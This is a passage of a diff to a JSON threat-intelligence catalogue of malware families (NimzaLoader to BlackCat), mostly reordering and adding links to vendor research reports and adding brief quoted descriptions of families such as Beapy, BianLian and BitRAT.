"https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware", + "https://twitter.com/James_inthe_box/status/1357009652857196546" ], "synonyms": [ "NimzaLoader" @@ -14940,11 +15635,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", + "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae", + "https://www.youtube.com/watch?v=uakw2HMGZ-I", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", - "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae" + "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html" ], "synonyms": [], "type": [] @@ -14957,6 +15653,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbtok", + "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/", "https://blog.360totalsecurity.com/en/360-file-less-attack-protection-intercepts-the-banker-trojan-bbtok-active-in-mexico/" ], "synonyms": [], @@ -14966,7 +15663,7 @@ "value": "BBtok" }, { - "description": "", + "description": "According to Symantec, Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy", @@ -14983,10 +15680,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop", - "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", - "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns", "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58", - "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/" + "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/", + "https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745", + "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns", + "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf" ], "synonyms": [], "type": [] @@ -14999,11 +15697,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep", - "https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html", "https://blog.talosintelligence.com/bedep-actor/", + "https://malware.dontneedcoffee.com/2016/04/bedepantiVM.html", + "https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html", "http://malware-traffic-analysis.net/2016/05/09/index.html", - "https://web.archive.org/web/20150524032716/http://asert.arbornetworks.com/bedeps-dga-trading-foreign-exchange-for-malware-domains/", - "https://malware.dontneedcoffee.com/2016/04/bedepantiVM.html" + "https://web.archive.org/web/20150524032716/http://asert.arbornetworks.com/bedeps-dga-trading-foreign-exchange-for-malware-domains/" ], "synonyms": [], "type": [] @@ -15081,8 +15779,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", - "https://securitykitten.github.io/2015/07/14/bernhardpos.html", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-07-14-bernhardpos.md" + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-07-14-bernhardpos.md", + "https://securitykitten.github.io/2015/07/14/bernhardpos.html" ], "synonyms": [], "type": [] @@ -15104,22 +15802,22 @@ "value": "BestKorea" }, { - "description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that’s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim’s machine and steal sensitive information.", + "description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that\u2019s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim\u2019s machine and steal sensitive information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", - "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html", - "https://news.sophos.com/en-us/2020/05/14/raticate/", - "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", - "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", - "http://www.xylibox.com/2015/04/betabot-retrospective.html", - "https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html", + "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt", "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", - "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39" + "http://www.xylibox.com/2015/04/betabot-retrospective.html", + "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", + "https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/" ], "synonyms": [ "Neurevt" @@ -15159,9 +15857,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt", - "https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/", + "https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger", "https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf", - "https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger" + "https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/" ], "synonyms": [], "type": [] @@ -15170,15 +15868,16 @@ "value": "BHunt" }, { - "description": "", + "description": "BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization\u2019s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims\u2019 systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian", "https://twitter.com/malwrhunterteam/status/1558548947584548865", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", "https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/", - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", "https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/" + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/" ], "synonyms": [], "type": [] @@ -15191,8 +15890,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware", - "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/", - "http://zirconic.net/2018/07/bi_d-ransomware/" + "http://zirconic.net/2018/07/bi_d-ransomware/", + "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/" ], "synonyms": [], "type": [] @@ -15219,13 +15918,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", + "https://habrahabr.ru/post/213973/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf", + "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/", + "https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html", "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf", "https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server", - "https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html", - "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/", - "https://habrahabr.ru/post/213973/", - "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/" + "https://securelist.com/versatile-ddos-trojan-for-linux/64361/" ], "synonyms": [], "type": [] @@ -15238,8 +15938,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen", - "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", - "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Binanen-B/detailed-analysis.aspx" + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Binanen-B/detailed-analysis.aspx", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood" ], "synonyms": [], "type": [] @@ -15252,10 +15952,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata", - "https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", "https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/", - "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", - "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + "https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/", + "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] @@ -15310,11 +16010,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/", "https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/", "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", - "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", - "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a", - "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/" + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a" ], "synonyms": [], "type": [] @@ -15327,8 +16027,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock", - "https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/", "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview", + "https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/", "https://twitter.com/malwrhunterteam/status/1215252402988822529" ], "synonyms": [], @@ -15343,8 +16043,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf", - "https://content.fireeye.com/apt/rpt-apt38", - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", + "https://content.fireeye.com/apt/rpt-apt38" ], "synonyms": [ "SHADYCAT" @@ -15359,12 +16059,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat", - "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", - "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", - "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/", - "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", - "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan" + "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/", + "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan", + "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", + "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html" ], "synonyms": [], "type": [] @@ -15373,35 +16073,37 @@ "value": "Bitter RAT" }, { - "description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer’s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT’s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.", + "description": "According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.\r\n\r\nFurthermore, each buyer\u2019s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.\r\n\r\nBitRAT\u2019s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/", - "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", - "https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/", - "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware", + "https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure", "https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://community.riskiq.com/article/ade260c6", - "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities", - "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/", + "https://asec.ahnlab.com/en/32781/", "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md", "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/", - "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", + "https://community.riskiq.com/article/ade260c6", + "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware", + "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/", - "https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/", - "https://asec.ahnlab.com/en/32781/", + "https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", + "https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/", + "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf", "https://www.youtube.com/watch?v=CYm3g4zkQdw", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/", + "https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", - "https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/" ], "synonyms": [], "type": [] @@ -15443,33 +16145,35 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta", "https://gbhackers.com/black-basta-ransomware/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", - "https://securelist.com/luna-black-basta-ransomware/106950", "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", - "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware", - "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware", - "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/", - "https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/", - "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies", - "https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware", - "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", - "https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/", - "https://www.zscaler.com/blogs/security-research/back-black-basta", - "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", - "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html", - "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta", "https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/", - "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/", + "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/", + "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview", "https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/", + "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies", "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", + "https://www.zscaler.com/blogs/security-research/back-black-basta", + "https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", + "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://securelist.com/luna-black-basta-ransomware/106950", + "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/", + "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/", + "https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/" ], "synonyms": [ "no_name_software" @@ -15484,26 +16188,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", - "https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", - "https://twitter.com/splinter_code/status/1628057204954652674", - "https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants", - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", - "https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/", - "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://www.ic3.gov/Media/News/2022/220211.pdf", + "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/", + "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups", "https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/", - "https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html", - "https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace", - "https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure", + "https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/", + "https://www.ic3.gov/Media/News/2022/220211.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", "https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/", - "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups" + "https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html", + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure", + "https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants", + "https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html", + "https://twitter.com/splinter_code/status/1628057204954652674", + "https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/", + "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/", + "https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace" ], "synonyms": [], "type": [] @@ -15516,57 +16222,62 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat", + "https://blog.group-ib.com/blackcat", + "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://www.varonis.com/blog/alphv-blackcat-ransomware", + "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + 